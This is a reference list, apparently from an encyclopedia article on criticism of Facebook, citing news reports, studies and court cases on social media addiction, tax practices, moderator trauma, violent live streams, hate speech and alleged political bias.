  188. Turel, Ofir; Bechara, Antoine (2016). "Social Networking Site Use While Driving: ADHD and the Mediating Roles of Stress, Self-Esteem and Craving". Frontiers in Psychology. 7. Frontiers Media. p. 455. doi:10.3389/fpsyg.2016.00455. PMID 27065923. Retrieved July 6, 2020.
  189. Settanni, Michele; Marengo, Davide; Fabris, Matteo Angelo; Longobardi, Claudio (2018). "The interplay between ADHD symptoms and time perspective in addictive social media use: A study of adolescent Facebook users". Children and Youth Services Review. 89. Elsevier. pp. 165–170. doi:10.1016/j.childyouth.2018.04.031.
  190. Savage, Michael (January 26, 2019). "Health secretary tells social media firms to protect children after girl's death". The Guardian. Retrieved January 30, 2019.
  191. editor, Richard Adams Education (January 30, 2019). "Social media urged to take 'moment to reflect' after girl's death". The Guardian. Retrieved January 30, 2019.CS1 maint: extra text: authors list (link)
  192. "Potential for Facebook addiction and consequences". July 15, 2012.
  193. "The Anti-Social Network". Slate.com. January 26, 2011.
  194. "How Facebook Breeds Jealousy". Discovery.com. February 10, 2010.
  195. "Study: Facebook makes lovers jealous". Cnet.com. August 11, 2009.
  196. "Jealous much? MySpace, Facebook can spark it". NBC News. July 31, 2007.
  197. "Facebook Causes Jealousy, Hampers Romance, Study Finds". University of Guelph. February 13, 2007.
  198. "Facebook jealousy sparks asthma attacks in dumped boy". Usatoday.com. November 19, 2010.
  199. Hanna Krasnova; Helena Wenninger; Thomas Widjaja; Peter Buxmann (January 23, 2013). "Envy on Facebook: A Hidden Threat to Users' Life Satisfaction?" (PDF). 11th International Conference on Wirtschaftsinformatik, February 27 – March 1, 2013, Leipzig, Germany. Archived from the original (PDF) on June 1, 2014. Retrieved June 13, 2014.
  200. BBC News - Facebook use 'makes people feel worse about themselves'. Bbc.co.uk (August 15, 2013). Retrieved on September 4, 2013.
  201. Myung Suh Lim; Junghyun Kim (June 4, 2018). "Facebook users' loneliness based on different types of interpersonal relationships: Links to grandiosity and envy". Information Technology & People. ISSN 0959-3845.
  202. Divorce cases get the Facebook factor. - MEN Media. Published January 19, 2011. Retrieved March 13, 2012.
  203. Facebook's Other Top Trend of 2009: Divorce Archived January 12, 2012, at the Wayback Machine - Network World. Published December 22, 2009. Retrieved March 13, 2012.
  204. "Facebook to Blame for Divorce Boom". Fox News. April 12, 2010. Archived from the original on April 15, 2010. Retrieved January 3, 2012.
  205. Facebook is divorce lawyers' new best friend - MSNBC. Published June 28, 2010. Retrieved March 13, 2012.
  206. "Facebook flirting triggers divorces". The Times Of India. January 1, 2012.
  207. Clayton, Russell B.; Nagurney, Alexander; Smith, Jessica R. (June 7, 2013). "Cheating, Breakup, and Divorce: Is Facebook Use to Blame?". Cyberpsychology, Behavior, and Social Networking. 16 (10): 717–720. doi:10.1089/cyber.2012.0424. ISSN 2152-2715. PMID 23745615.
  208. Utz, Sonja; Beukeboom, Camiel J. (July 1, 2011). "The Role of Social Network Sites in Romantic Relationships: Effects on Jealousy and Relationship Happiness". Journal of Computer-Mediated Communication. 16 (4): 511–527. doi:10.1111/j.1083-6101.2011.01552.x. ISSN 1083-6101.
  209. Tokunaga, Robert S. (2011). "Social networking site or social surveillance site? Understanding the use of interpersonal electronic surveillance in romantic relationships". Computers in Human Behavior. 27 (2): 705–713. doi:10.1016/j.chb.2010.08.014.
  210. Muise, Amy; Christofides, Emily; Desmarais, Serge (April 15, 2009). "More Information than You Ever Wanted: Does Facebook Bring Out the Green-Eyed Monster of Jealousy?". CyberPsychology & Behavior. 12 (4): 441–444. doi:10.1089/cpb.2008.0263. ISSN 1094-9313. PMID 19366318.
  211. Kerkhof, Peter; Finkenauer, Catrin; Muusses, Linda D. (April 1, 2011). "Relational Consequences of Compulsive Internet Use: A Longitudinal Study Among Newlyweds" (PDF). Human Communication Research. 37 (2): 147–173. doi:10.1111/j.1468-2958.2010.01397.x. hdl:1871/35795. ISSN 1468-2958.
  212. Papp, Lauren M.; Danielewicz, Jennifer; Cayemberg, Crystal (October 11, 2011). ""Are We Facebook Official?" Implications of Dating Partners' Facebook Use and Profiles for Intimate Relationship Satisfaction". Cyberpsychology, Behavior, and Social Networking. 15 (2): 85–90. doi:10.1089/cyber.2011.0291. ISSN 2152-2715. PMID 21988733.
  213. "Does Facebook Stress You Out?". Webpronews.com. February 17, 2010. Archived from the original on February 18, 2011.
  214. Maier, C., Laumer, S., Eckhardt, A., and Weitzel, T. Online Social Networks as a Source and Symbol of Stress: An Empirical Analysis Proceedings of the 33rd International Conference on Information Systems (ICIS) 2012, Orlando (FL)
  215. Maier, C.; Laumer, S.; Eckhardt, A.; Weitzel, T. (2014). "Giving too much Social Support: Social Overload on Social Networking Sites". European Journal of Information Systems. 24: 447–464. doi:10.1057/ejis.2014.3.
  216. McCain, Jessica L.; Campbell, W. Keith (2018). "Narcissism and Social Media Use: A Meta-Analytic Review". Psychology of Popular Media Culture. 7 (3). American Psychological Association. pp. 308–327. doi:10.1037/ppm0000137. Retrieved June 9, 2020.
  217. Gnambs, Timo; Appel, Markus (2018). "Narcissism and Social Networking Behavior: A Meta-Analysis". Journal of Personality. 86 (2). Wiley-Blackwell. pp. 200–212. doi:10.1111/jopy.12305. PMID 28170106. Retrieved June 9, 2020.
  218. Brailovskaia, Julia; Bierhoff, Hans-Werner (2020). "The Narcissistic Millennial Generation: A Study of Personality Traits and Online Behavior on Facebook". Journal of Adult Development. 27 (1). Springer Science+Business Media. pp. 23–35. doi:10.1007/s10804-018-9321-1. Retrieved June 9, 2020.
  219. Casale, Silvia; Banchi, Vanessa (2020). "Narcissism and problematic social media use: A systematic literature review". Addictive Behaviors Reports. 11. Elsevier. doi:10.1016/j.abrep.2020.100252. Retrieved June 9, 2020.
  220. Lukianoff, Greg; Haidt, Jonathan (2018). The Coddling of the American Mind: How Good Intentions and Bad Ideas Are Setting Up a Generation for Failure. New York: Penguin Press. p. 147. ISBN 978-0735224896.
  221. Lee, Sangwon; Xenos, Michael (2019). "Social distraction? Social media use and political knowledge in two U.S. Presidential elections". Computers in Human Behavior. 90: 18–25. doi:10.1016/j.chb.2018.08.006.
  222. Lukianoff, Greg; Haidt, Jonathan (2018). The Coddling of the American Mind: How Good Intentions and Bad Ideas Are Setting Up a Generation for Failure. New York: Penguin Press. pp. 126–132. ISBN 978-0735224896.
  223. File, Thom (May 2013). Computer and Internet Use in the United States (PDF) (Report). Current Population Survey Reports. Washington, D.C.: U.S. Census Bureau. Retrieved February 11, 2020.
  224. Haidt, Jonathan; Rose-Stockwell, Tobias (2019). "The Dark Psychology of Social Networks". The Atlantic. 324 (6). Emerson Collective. pp. 57–60. Retrieved June 11, 2020.
  225. Gregory, Andy (November 7, 2019). "More than a third of millennials approve of communism, YouGov poll indicates". The Independent. Independent Digital News & Media Ltd. Retrieved June 11, 2020.
  226. Saad, Lydia (November 25, 2019). "Socialism as Popular as Capitalism Among Young Adults in U.S." Gallup. Retrieved June 11, 2020.
  227. Bromley, Alanna (2011). "Are social networking sites breeding antisocial young people?" (PDF). Journal of Digital Research and Publishing.
  228. "Students Take On Cyberbullying". YouTube.
  229. Baron, Naomi S. (2007). "My Best Day: Presentation of Self and Social Manipulation in Facebook and IM" (PDF). Archived from the original (PDF) on May 23, 2013.
  230. "A new addiction for teacher candidates: social networks" (PDF). The Turkish Online Journal of Educational Technology. 11 (3). 2012.
  231. Turkle, Sherry (2011): Alone Together. Why We Expect More from Technology and Less from Each Other. New York: Basic Books.
  232. Robert M. Bond; Christopher J. Fariss; Jason J. Jones; Adam D. I. Kramer; Cameron Marlow; Jaime E. Settle; James H. Fowler (2012). "A 61-million-person experiment in social influence and political mobilization". Nature. 489 (7415): 295–298. doi:10.1038/nature11421. PMC 3834737. PMID 22972300.
  233. Robert Booth (2014). "Facebook reveals news feed experiment to control emotions". The Guardian. Retrieved June 30, 2014.
  234. Adam D. I. Kramer, Jamie E. Guillory. Jeffrey T. Hancock (2014). "Experimental evidence of massive-scale emotional contagion through social networks". Proceedings of the National Academy of Sciences of the United States of America. 111 (24): 8788–8790. doi:10.1073/pnas.1320040111. PMC 4066473. PMID 24889601.
  235. "Facebook update". Retrieved July 14, 2019.(subscription required)
  236. David Goldman (July 2, 2014). "Facebook still won't say 'sorry' for mind games experiment". CNNMoney. Retrieved July 3, 2014.
  237. Guynn, Jessica (July 3, 2014). "Privacy watchdog files complaint over Facebook study". USA Today. USA Today. Retrieved July 5, 2014.
  238. Grohol, John. "Emotional Contagion on Facebook? More Like Bad Research Methods". Psych Central. PsychCentral. Retrieved July 12, 2014.
  239. Rudder, Christian (July 28, 2014). "We experiment on human beings". okcupid.com. Archived from the original on January 23, 2015. Retrieved July 14, 2019.
  240. Grimmelmann, James (September 23, 2014). "Illegal, immoral, and mood-altering: How Facebook and OkCupid broke the law when they experimented on users". Retrieved September 24, 2014.
  241. "Facebook's 'experiment' was socially irresponsible". The Guardian. July 1, 2014. Retrieved August 4, 2014.
  242. Neate, Rupert (December 23, 2012). "Facebook paid £2.9m tax on £840m profits made outside US, figures show". The Guardian. Retrieved October 25, 2016.
  243. "Paradise Papers reveal hidden wealth of global elite". The Express Tribune. November 6, 2017.
  244. van Noort, Wouter (November 11, 2017). "Belastingontwijking is simpel op te lossen" [Tax avoidance can easily be solved]. NRC Handelsblad (in Dutch). Retrieved July 14, 2019. The quote, as heading of the article, comes from the French economist Gabriel Zucman.
  245. "Facebook paid £4,327 corporation tax in 2014". Bbc.co.uk. October 12, 2015. Retrieved October 25, 2016.
  246. Tang, Paul (September 2017). "EU Tax Revenue Loss from Google and Facebook" (PDF).
  247. 26 U.S.C. § 7602.
  248. Seth Fiegerman, "Facebook is being investigated by the IRS," July 7, 2016, CNN, at .
  249. United States of America v. Facebook, Inc. and Subsidiaries, case no. 16-cv-03777, U.S. District Court for the Northern District of California (San Francisco Div.).
  250. "Facebook paid just €30m tax in Ireland despite earning €12bn". Irish Indepdenent. November 29, 2017.
  251. "Facebook Ireland pays tax of just €30m on €12.6bn". Irish Examiner. November 29, 2017.
  252. David Ingram (April 18, 2018). "Exclusive: Facebook to put 1.5 billion users out of reach of new EU privacy law". Reuters.
  253. Peter Hamilton (November 28, 2018). "Facebook Ireland pays €38m tax on €18.7 billion of revenue channeled through Ireland in 2017". Irish Times. The social media giant channelled €18.7 billion in revenue through its Irish subsidiary, an increase of 48 per cent from the €12.6 billion recorded in 2016. While gross profit amounted to €18.1 billion, administrative expenses of €17.8 billion meant profit before tax increased 44 per cent to €251 million.
  254. Newton, Casey (February 25, 2019). "THE TRAUMA FLOOR: The secret lives of Facebook moderators in America". The Verge. Retrieved February 25, 2019.
  255. O'Connell, Jennifer (March 30, 2019). "Facebook's dirty work in Ireland: 'I had to watch footage of a person being beaten to death'". The Irish Times. Retrieved June 21, 2019.
  256. Newton, Casey (June 19, 2019). "Three Facebook moderators break their NDAs to expose a company in crisis". The Verge. Retrieved June 21, 2019.
  257. Wong, Queenie (June 19, 2019). "Murders and suicides: Here's who keeps them off your Facebook feed". CNET. Retrieved June 21, 2019.
  258. [254][255][256][257]
  259. Eadicicco, Lisa (June 19, 2019). "A Facebook content moderator died after suffering heart attack on the job". San Antonio Express-News. Retrieved June 20, 2019.
  260. Maiberg, Emanuel; Koebler, Jason; Cox, Joseph (September 24, 2018). "A Former Content Moderator Is Suing Facebook Because the Job Reportedly Gave Her PTSD". Vice. Retrieved June 21, 2019.
  261. Gray, Chris; Hern, Alex (December 4, 2019). "Ex-Facebook worker claims disturbing content led to PTSD". Guardian. Retrieved February 25, 2020.
  262. "Facebook sued by Tampa workers who say they suffered trauma from watching videos". Tampa Bay Times. Retrieved May 8, 2020.
  263. Leprince-Ringuet, Daphne. "Facebook's approach to content moderation slammed by EU commissioners". ZDNet. Retrieved February 19, 2020.
  264. Newton, Casey (May 12, 2020). "Facebook will pay $52 million in settlement with moderators who developed PTSD on the job". The Verge. Retrieved June 1, 2020.
  265. Allyn, Bobby (May 12, 2020). "In Settlement, Facebook To Pay $52 Million To Content Moderators With PTSD". NPR. Retrieved June 1, 2020.
  266. Paul, Kari (May 13, 2020). "Facebook to pay $52m for failing to protect moderators from 'horrors' of graphic content". The Guardian. Retrieved June 1, 2020.
  267. Streitfeld, David (March 21, 2018). "Welcome to Zucktown. Where Everything Is Just Zucky". The New York Times. Retrieved February 25, 2019.
  268. Pepitone, Julianne. "Facebook vs. Google fight turns nasty". CNNMoney. Retrieved February 23, 2019.
  269. Setalvad, Ariha (August 7, 2015). "Why Facebook's video theft problem can't last". The Verge. Vox Media. Retrieved May 29, 2017.
  270. Oremus, Will (July 8, 2015). "Facebook's Piracy Problem". Slate. The Slate Group. Retrieved May 29, 2017.
  271. Luckerson, Victor (August 28, 2015). "Facebook to Crack Down on Online Video Piracy". Time. Retrieved May 29, 2017.
  272. Constine, Josh (April 12, 2016). "Facebook launches video Rights Manager to combat freebooting". TechCrunch. AOL. Retrieved May 29, 2017.
  273. Kelion, Leo (May 1, 2013). "Facebook U-turn after charities criticise decapitation videos". BBC News. BBC. Retrieved June 3, 2017.
  274. Winter, Michael (October 21, 2013). "Facebook again allows violent videos, with caveat". USA Today. Gannett Company. Retrieved June 3, 2017.
  275. "Facebook pulls beheading video". The Telegraph. Telegraph Media Group. October 23, 2013. Retrieved June 3, 2017.
  276. Harrison, Virginia (October 23, 2013). "Outrage erupts over Facebook's decision on graphic videos". CNNMoney. CNN. Retrieved June 3, 2017.
  277. Gibbs, Samuel (January 13, 2015). "Facebook tackles graphic videos and photos with 'are you sure?' warnings". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  278. Kelion, Leo (January 13, 2015). "Facebook restricts violent video clips and photos". BBC News. BBC. Retrieved June 3, 2017.
  279. "Libya 'war crimes' videos shared online". BBC News. Retrieved September 23, 2019.
  280. Libyan conflict: Suspected war crimes shared online - BBC Newsnight, retrieved September 23, 2019
  281. https://www.icc-cpi.int/CaseInformationSheets/al-werfalliEng.pdf
  282. "Community Standards | Facebook". www.facebook.com. Retrieved September 23, 2019.
  283. Mangalindan, JP (August 5, 2015). "Facebook launches live streaming, but only for famous people". Mashable. Retrieved June 3, 2017.
  284. Barrett, Brian (January 28, 2016). "Facebook Livestreaming Opens Up to Everyone With an iPhone". Wired. Condé Nast. Retrieved June 3, 2017.
  285. Newton, Casey (January 28, 2016). "Facebook rolls out live video streaming to everyone in the United States". The Verge. Vox Media. Retrieved June 3, 2017.
  286. Newton, Casey (December 3, 2015). "Facebook begins testing live video streaming for all users". The Verge. Vox Media. Retrieved June 3, 2017.
  287. Chrisafis, Angelique; Willsher, Kim (June 14, 2016). "French police officer and partner murdered in 'odious terrorist attack'". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  288. Madden, Justin (June 17, 2016). "Chicago man shot dead while live streaming on Facebook". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  289. Chaykowski, Kathleen (July 7, 2016). "Philando Castile's Death On Facebook Live Highlights Problems For Social Media Apps". Forbes. Retrieved June 3, 2017.
  290. McLaughlin, Eliott C.; Blau, Max; Vercammen, Paul (September 30, 2016). "Police: Man killed by officer pointed vaping device, not gun". CNN. Retrieved June 3, 2017.
  291. Berman, Mark; Hawkins, Derek (January 5, 2017). "Hate crime charges filed after 'reprehensible' video shows attack on mentally ill man in Chicago". The Washington Post. Nash Holdings. Retrieved June 3, 2017.
  292. Steele, Billy (March 22, 2017). "Dozens watched a Facebook Live stream of sexual assault (updated)". Engadget. AOL. Retrieved June 3, 2017.
  293. Gibbs, Samuel (April 25, 2017). "Facebook under pressure after man livestreams killing of his daughter". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  294. Solon, Olivia (January 27, 2017). "Why a rising number of criminals are using Facebook Live to film their acts". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  295. Solon, Olivia; Levin, Sam (January 6, 2017). "Facebook refuses to explain why live torture video wasn't removed sooner". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  296. Krasodomski-Jones, Alex (January 9, 2017). "Facebook has created a monster it cannot tame". CNN. Retrieved June 3, 2017.
  297. Bhattacharya, Ananya (June 18, 2016). "Facebook Live is becoming a gruesome crime scene for murders". Quartz. Atlantic Media. Retrieved June 3, 2017.
  298. Gibbs, Samuel (May 3, 2017). "Facebook Live: Zuckerberg adds 3,000 moderators in wake of murders". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  299. Murphy, Mike (May 3, 2017). "Facebook is hiring 3,000 more people to monitor Facebook Live for murders, suicides, and other horrific video". Quartz. Atlantic Media. Retrieved June 3, 2017.
  300. Ingram, David (May 3, 2017). "Facebook tries to fix violent video problem with 3,000 new workers". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  301. Peng, Tina (November 22, 2008). "Pro-anorexia groups spread to Facebook". Newsweek. Retrieved June 13, 2017.
  302. "Pro-anorexia site clampdown urged". BBC News. BBC. February 24, 2008. Retrieved June 13, 2017.
  303. Masciarelli, Alexis (January 9, 2009). "Anger at pro-Mafia groups on Facebook". France 24. France Médias Monde. Archived from the original on September 6, 2009. Retrieved June 13, 2017.
  304. Donadio, Rachel (January 20, 2009). "Italian authorities wary of Facebook tributes to Mafia". The New York Times International Edition. Archived from the original on January 24, 2009. Retrieved June 13, 2017.
  305. Pullella, Philip (January 12, 2009). "Pro-mafia Facebook pages cause alarm in Italy". Reuters. Thomson Reuters. Retrieved June 13, 2017.
  306. Krangel, Eric (February 11, 2009). "Italy Considering National Ban On Facebook, YouTube In Plan To Return To Dark Ages". Business Insider. Axel Springer SE. Retrieved June 13, 2017.
  307. Kington, Tom (February 16, 2009). "Italian bill aims to block mafia Facebook shrines". The Guardian. Guardian Media Group. Retrieved June 13, 2017.
  308. Nicole, Kristen (February 12, 2009). "Mafia Bosses Could Cause Italy's Blocking of Facebook". Adweek. Beringer Capital. Retrieved June 13, 2017.
  309. Oates, John (February 12, 2009). "Facebook hits back at Italian ban". The Register. Situation Publishing. Retrieved June 13, 2017.
  310. "Trolling: The Today Show Explores the Dark Side of the Internet", March 31, 2010. Retrieved April 4, 2010. Archived June 8, 2010, at the Wayback Machine
  311. s127 of the Communications Act 2003 of Great Britain. Retrieved July 13, 2011.
  312. Murder victim-mocking troll jailed, The Register, November 1, 2010. Retrieved July 13, 2011.
  313. Jade Goody website 'troll' from Manchester jailed, BBC, October 29, 2010. Retrieved July 13, 2011.
  314. Facebook troll Bradley Paul Hampson seeks bail, appeal against jail term, The Courier-Mail, April 20, 2011. Retrieved July 13, 2011.
  315. Facebook urged to ban teens from setting up tribute pages, The Australian, June 5, 2010. Retrieved July 13, 2011.
  316. Sherwell, Philip (October 16, 2011). "Cyber anarchists blamed for unleashing a series of Facebook 'rape pages'". Daily Telegraph. London. Retrieved May 22, 2012.
  317. "Facebook 'rape page' whitelisted and campaign goes global". Womensviewsonnews.org. Meanwhile, campaigns in other countries have begun, most notably in Canada with the Rape is no joke (RINJ) campaign, which has not only campaigned fiercely but has also put together a YouTube video.
  318. "Facebook Refuses To Remove Rape Pages..." Albuquerque Express. October 23, 2011. Archived from the original on September 3, 2017. Retrieved May 22, 2012.
  319. "Facebook Refuses to Remove 'Rape Pages' Linked to Australian, British Youth". International Business Times. October 18, 2011. Archived from the original on July 17, 2012. Retrieved May 22, 2012. O'Brien said the campaign is now focusing on Facebook advertisers telling them not to let their advertisements be posted on the "rape pages."
  320. Sara C Nelson (May 28, 2013). "#FBrape: Will Facebook Heed Open Letter Protesting 'Endorsement Of Rape & Domestic Violence'?". The Huffington Post UK. Retrieved May 29, 2013.
  321. Rory Carroll (May 29, 2013). "Facebook gives way to campaign against hate speech on its pages". The Guardian UK. London. Retrieved May 29, 2013.
  322. "Facebook criticised by NSPCC over baby ducking video clip". BBC News. June 5, 2015.
  323. "Facebook failed to remove sexualised images of children". BBC News. Retrieved March 9, 2017.
  324. "Facebook, Twitter and Google grilled by MPs over hate speech". BBC News. Retrieved March 14, 2017.
  325. Layug, Margaret Claire (July 3, 2017). "'Pastor Hokage' FB groups trading lewd photos of women exposed". GMA News. Retrieved July 8, 2017.
  326. Layug, Margaret Claire (July 5, 2017). "Victim of 'Pastor' FB reports harassment, indecent proposals". GMA News. Retrieved July 8, 2017.
  327. De Jesus, Julliane Love (July 6, 2017). "Hontiveros wants stiff penalties vs 'Pastor Hokage' FB groups". Philippine Daily Inquirer. Retrieved July 8, 2017.
  328. "When it comes to incitement, is Facebook biased against Israel? - Arab-Israeli Conflict - Jerusalem Post". Jpost.com. Retrieved December 16, 2018.
  329. JTA (September 27, 2016). "Facebook tightens ad policy after 'Jew hater' controversy — J". Jweekly.com. Retrieved September 29, 2017.
  330. Gagliardo-Silver, Victoria (March 29, 2019). "Instagram refuses to remove Alex Jones' anti-semitic post". The Independent. Retrieved March 30, 2019.
  331. "20,000 Israelis sue Facebook for ignoring Palestinian incitement". The Times of Israel. October 27, 2015. Retrieved July 15, 2016.
  332. "Israel: Facebook's Zuckerberg has blood of slain Israeli teen on his hands". The Times of Israel. July 2, 2016. Retrieved July 15, 2016.
  333. Wittes, Benjamin; Bedell, Zoe (July 12, 2016). "Facebook, Hamas, and Why a New Material Support Suit May Have Legs". Lawfare.
  334. Pileggi, Tamar (July 11, 2016). "US terror victims seek $1 billion from Facebook for Hamas posts". The Times of Israel. Retrieved July 15, 2016.
  335. Dolmetsch, Chris (July 31, 2019). "Facebook Isn't Responsible as Terrorist Platform, Court Says". Bloomberg. Retrieved August 7, 2019.
  336. "Facebook Defeats Appeal Claiming It Aided Hamas Attacks". Law360. July 31, 2019. Retrieved August 6, 2019.
  337. "Hezbollah created Palestinian terror cells on Facebook, Israel says after bust". JTA. August 16, 2016. Retrieved August 17, 2016.
  338. Zitun, Yoav (August 16, 2016). "Shin Bet catches Hezbollah recruitment cell in the West Bank". Ynet News. Retrieved August 17, 2016.
  339. Gross, Judah Ari (August 16, 2016). "Hezbollah terror cells, set up via Facebook in West Bank and Israel, busted by Shin Bet". The Times of Israel. Retrieved August 17, 2016.
  340. "Knesset approves Facebook bill in preliminary vote". July 20, 2016. Retrieved July 24, 2016.
  341. Lecher, Colin (June 15, 2017). "Facebook says it wants 'to be a hostile place for terrorists'". The Verge. Vox Media. Retrieved June 16, 2017.
  342. "Facebook using artificial intelligence to fight terrorism". CBS News. CBS. June 15, 2017. Retrieved June 16, 2017.
  343. Solon, Olivia (June 16, 2017). "Revealed: Facebook exposed identities of moderators to suspected terrorists". The Guardian. Guardian Media Group. Retrieved June 18, 2017.
  344. Wong, Joon Ian (June 16, 2017). "The workers who police terrorist content on Facebook were exposed to terrorists by Facebook". Quartz. Atlantic Media. Retrieved June 18, 2017.
  345. "Facebook Deletes Iran-Linked Accounts Followed By 1 Million In U.S., Britain". RFE/RL. Retrieved December 15, 2018.
  346. Shahani, Aarti (November 17, 2016). "From Hate Speech To Fake News: The Content Crisis Facing Mark Zuckerberg". NPR.
  347. Burke, Samuel (November 19, 2016). "Zuckerberg: Facebook will develop tools to fight fake news". CNN Money. Retrieved November 22, 2016.
  348. Shahani, Aarti. Zuckerberg Denies Fake News on Facebook had Impact on the Election. Washington: NPR, 2016. ProQuest.
  349. Kravets, David. Facebook, Google Seek to Gut Fake News Sites’ Money Stream. New York: Condé Nast Publications, Inc., 2016. ProQuest. Web. December 5, 2016.
  350. Kravets, David. Facebook, Google Seek to Gut Fake News Sites’ Money Stream. New York: Condé Nast Publications, Inc., 2016. ProQuest. Web. December 6, 2016.
  351. Newitz, Annalee. Facebook Fires Human Editors, Algorithm Immediately Posts Fake News. New York: Condé Nast Publications, Inc., 2016. ProQuest. Web. December 6, 2016.
  352. Safi, Michael (March 14, 2018). "Sri Lanka accuses Facebook over hate speech after deadly riots". The Guardian.
  353. Fisher, Amanda Taub and Max. "Where Countries Are Tinderboxes and Facebook Is a Match". Retrieved November 28, 2018.
  354. Stecklow, Steve. "Why Facebook is losing the war on hate speech in Myanmar". Reuters. Retrieved December 15, 2018.
  355. "Facebook bans Myanmar military accounts for 'enabling human rights abuses'". Social.techcrunch.com. Retrieved December 15, 2018.
  356. "Some in Myanmar Fear Fallout From Facebook Removal of Military Pages". Radio Free Asia. Retrieved December 15, 2018.
  357. "Facebook Removes More Pages And Groups Linked to Myanmar Military". Radio Free Asia. Retrieved January 30, 2019.
  358. "'Person of eminence' tag on FB for convict Ajay Chautala". December 17, 2018.
  359. Beckett, Lois (March 27, 2019). "Facebook to ban white nationalism and separatism content". the Guardian. Retrieved March 28, 2019.
  360. Dearden, Lizzie (March 24, 2019). "Neo-Nazi groups allowed to stay on Facebook because they 'do not violate community standards'". The Independent. Retrieved March 28, 2019.
  361. Copley, Caroline (March 4, 2016). "German court rules Facebook may block pseudonyms". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  362. Ortutay, Barbara (May 25, 2009). "Real users caught in Facebook fake-name purge". San Francisco Chronicle. Hearst Communications. Retrieved June 3, 2017.
  363. Levy, Karyne (October 1, 2014). "Facebook Apologizes For 'Real Name' Policy That Forced Drag Queens To Change Their Profiles". Business Insider. Axel Springer SE. Retrieved March 23, 2017.
  364. Crook, Jordan (October 1, 2014). "Facebook Apologizes To LGBT Community And Promises Changes To Real Name Policy". TechCrunch. AOL. Retrieved June 3, 2017.
  365. Osofsky, Jason; Gage, Todd (December 15, 2015). "Community Support FYI: Improving the Names Process on Facebook". Facebook Newsroom. Facebook. Retrieved December 16, 2015.
  366. AFP (December 16, 2015). "Facebook modifies 'real names' policy, testing use of assumed names". CTV News. Bell Media. Retrieved December 16, 2015.
  367. Holpuch, Amanda (December 15, 2015). "Facebook adjusts controversial 'real name' policy in wake of criticism". The Guardian. Guardian Media Group. Retrieved March 23, 2017.
  368. Halliday, Josh (July 6, 2013). "Facebook apologises for deleting free speech group's post on Syrian torture". Guardian.co.uk. London. Retrieved June 4, 2013.
  369. "Jealous Wives Are Getting Courtney Stodden Banned on Facebook - Softpedia". News.softpedia.com. October 14, 2011. Retrieved July 31, 2012.
  370. "When good lulz go bad: unpicking the ugly business of online harassment". Wired.co.uk. January 27, 2014. Retrieved August 23, 2017.
  371. "Niet compatibele browser". Facebook. Archived from the original on June 13, 2010. Retrieved August 7, 2010.
  372. "Caroline McCarthy, "Facebook outage draws more security questions", CNET News.com, ZDNet Asia, August 2, 2007". Zdnetasia.com. August 2, 2007. Archived from the original on May 31, 2008. Retrieved March 23, 2010.
  373. "David Hamilton, "Facebook Outage Hits Some Countries", Web Host Industry Review, Jun. 26, 2008". Thewhir.com. Archived from the original on April 2, 2010. Retrieved March 23, 2010.
  374. "K.C. Jones, "Facebook, MySpace More Reliable Than Peers", Information Week, February 19, 2009". Informationweek.com. Retrieved March 23, 2010.
  375. "Facebook Outage and Facebook Down September 18 2009". Archived from the original on August 9, 2010. Retrieved August 30, 2010.
  376. McCarthy, Caroline (October 8, 2009). "Facebook's mounting customer service crisis | The Social - CNET News". News.cnet.com. Retrieved December 13, 2009.
  377. McCarthy, Caroline (October 10, 2009). "Downed Facebook accounts still haven't returned | The Social - CNET News". News.cnet.com. Retrieved December 13, 2009.
  378. "Facebook Outage Silences 150,000 Users". PC World. October 13, 2009. Retrieved December 13, 2009.
  379. Gaudin, Sharon (October 13, 2009). "Facebook deals with missing accounts, 150,000 angry users". Computerworld.com. Retrieved December 13, 2009.
  380. Reisinger, Don (May 18, 2012). "Facebook sued for $15 billion over alleged privacy infractions". News.cnet.com. Retrieved February 23, 2014.
  381. "After privacy ruling, Facebook now requires Belgium users to log in to view pages". The Verge. Retrieved December 17, 2015.
  382. Gordon, Whitson. "Facebook Changed Everyone's Email to @Facebook.com; Here's How to Fix Yours". Lifehacker.com. Retrieved October 25, 2016.
  383. Johnston, Casey (July 2, 2012). "@facebook.com e-mail plague chokes phone address books". Ars Technica. Condé Nast. Retrieved June 14, 2017.
  384. Hamburger, Ellis (February 24, 2014). "Facebook retires its troubled @facebook.com email service". Theverge.com. Retrieved October 25, 2016.
  385. "Facebook mistakenly asked people if they were in Pakistan following a deadly explosion". Tech Insider. Retrieved March 27, 2016.
  386. "Facebook's Safety Check malfunctions after Pakistan bombing". CNET. Retrieved March 27, 2016.
  387. Michael Arrington, Is Facebook Really Censoring Search When It Suits Them?, TechCrunch, November 22, 2007
  388. Bowles, Nellie; Thielman, Sam (May 9, 2016). "Facebook accused of censoring conservatives, report says". The Guardian. Retrieved May 25, 2016.
    Nunez, Gizmodo (May 9, 2016). "Former Facebook Workers: We Routinely Suppressed Conservative News". Gizmodo.com. Retrieved September 8, 2018.
  389. Hunt, Elle (May 24, 2016). "Facebook to change trending topics after investigation into bias claims". the Guardian. Retrieved May 25, 2016.
  390. "Facebook apologises for blocking Prager University's videos". BBC. August 20, 2018. Retrieved August 22, 2018.
  391. Zhou, Marrian (August 21, 2018). "Facebook apologizes for removing conservative PragerU videos". CNET. Retrieved August 22, 2018.
  392. Schwartz, Jason (March 29, 2018). "Conservative outlets take on Facebook". Politico. Retrieved September 8, 2018.
  393. Flood, Brian (September 5, 2018). "Conservatives ditching Facebook over trust issues and fears of political bias, study shows". Fox News. Retrieved September 8, 2018.
  394. "Congressman Matt Gaetz Files Criminal Referral Against Facebook CEO Mark Zuckerberg". Congressman Matt Gaetz. July 27, 2020. Retrieved July 28, 2020.
  395. "Matt Gaetz Files Criminal Referral Against Facebook CEO Mark Zuckerberg, Urges William Barr To Investigate". Florida Daily. Retrieved July 28, 2020.
  396. Dube Dwilson, Stephanie (October 13, 2018). "Yes, Facebook Is Blocking Minds Links as 'Unsecure'". Heavy.com. Retrieved October 21, 2018.
  397. Klint, Finley (November 11, 2015). "Facebook is blocking an upstart rival - but it's complicated". Wired.com. Retrieved October 21, 2018.
  398. Kelly, Makena (March 11, 2019). "Facebook proves Elizabeth Warren's point by deleting her ads about breaking up Facebook". The Verge. Retrieved February 25, 2020.
